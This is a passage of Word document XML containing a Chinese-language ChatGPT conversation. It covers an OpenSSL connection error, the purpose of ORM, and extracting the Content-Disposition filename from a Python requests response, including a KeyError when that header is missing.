        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库抛出的。解决这个问题可能需要：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DD7A5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F6DF08" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库都是最新版本。新版本的库通常会支持更多的协议版本和加密套件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D72D1E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你正在尝试连接到的服务器使用的是自签名证书，你可能需要在代码中显式地接受这个证书。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAB15C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你控制服务器，你可能需要检查服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置。特别地，如果服务器配置为只接受较新的协议版本，而客户端只支持较旧的版本，那么你可能需要更新服务器或客户端的配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA311FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查你的网络连接，确保数据可以可靠地传输。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF591E5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EAAB26" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果以上方法都无法解决问题，那么你可能需要进一步调查。错误的详细信息（比如完整的错误堆栈）可能会提供额外的线索。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4AA0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC4EA6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意义是什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59920A4C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A1F733" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2 / 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A954774" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE30482" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object-Relational Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对象关系映射）是一种程序设计技术，用于实现面向对象编程语言里不同类型系统的数据之间的转换。从效果上说，它创建了一个可在编程语言中使用的“虚拟对象数据库”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30C120" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6DB08E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体在数据库应用中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术主要做的事情就是在面向对象编程语言和关系型数据库之间建立一种映射关系，使我们在进行数据库操作的时候，不需要编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，只需要操作编程语言中的对象，就可以完成对数据库中数据的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B1FCF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A03B70" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意义主要体现在以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C151F9D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416AA167" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提高开发效率：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，开发者可以使用面向对象的思维进行数据库操作，而不必去编写繁琐的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，这无疑可以极大地提高开发效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BEBE51" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A97F15B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提高代码可读性：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具会将复杂的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句转化为相对简洁的面向对象操作，极大地提高了代码的可读性，降低了维护成本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12131849" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01977566" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库无关性：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的另一个重要的优点是它可以使你的代码对特定的数据库管理系统（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）保持无关性。你可以更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架的配置，从而更改整个应用程序使用的数据库，而不需要改动应用程序的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F8B78" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A164405" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了数据模型之间的转换规则：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，我们可以把表结构映射到对象，从而在面向对象的语言中更方便地操作数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C7FD2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0300713C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意义在于它极大地简化了数据库操作，使开发者可以更专注于业务逻辑的实现，而无需过多关注底层数据库操作的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304CB63" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB5E79" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">res = requests.get()   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何获取相应头的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pragma: private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6419B5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Disposition: attachment; filename="50077.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AEEC0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E605DC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707B6EAF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性获取响应头信息，这将返回一个字典，你可以从中获取你需要的特定头部信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A521E65" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B64EBF9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD7CC8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7568EFE0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C761E1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D02D82B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512BC4E2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>res = requests.get('url')  # Replace 'url' with your actual URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172CF516" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(res.headers['Content-Disposition'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2FE72" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA830C1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这个操作是大小写不敏感的，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>content-disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都能获取到正确的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863580C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5635889E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值通常是这样的形式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attachment; filename="50077.py"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。为了只获取文件名，你可以使用以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC70172" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138F4969" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFF032" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEB110" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CB993E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>res = requests.get('url')  # Replace 'url' with your actual URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C29E9E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>content_disposition = res.headers['Content-Disposition']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394BC4A1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>filename = content_disposition.split('filename=')[1].strip('"')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC314EE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906AA08" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB5B7E5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的代码首先获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部，然后以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filename=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分割字符串，并取结果的第二部分（即文件名），最后去除文件名两侧可能存在的引号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695C8E80" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3BB30" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return self._store[key.lower()][1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC0EF7D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>KeyError: 'content-disposition'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B05A16" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CE95D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061179DE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个错误表明你试图访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Content-Disposition </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不存在于响应头信息中。一般情况下，这个响应头只在服务器需要指定文档的呈现方式时出现，如附件下载。如果你没有对应的需求，或者服务器没有设置这个响应头，那么尝试访问它会引发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> KeyError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677CEE65" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
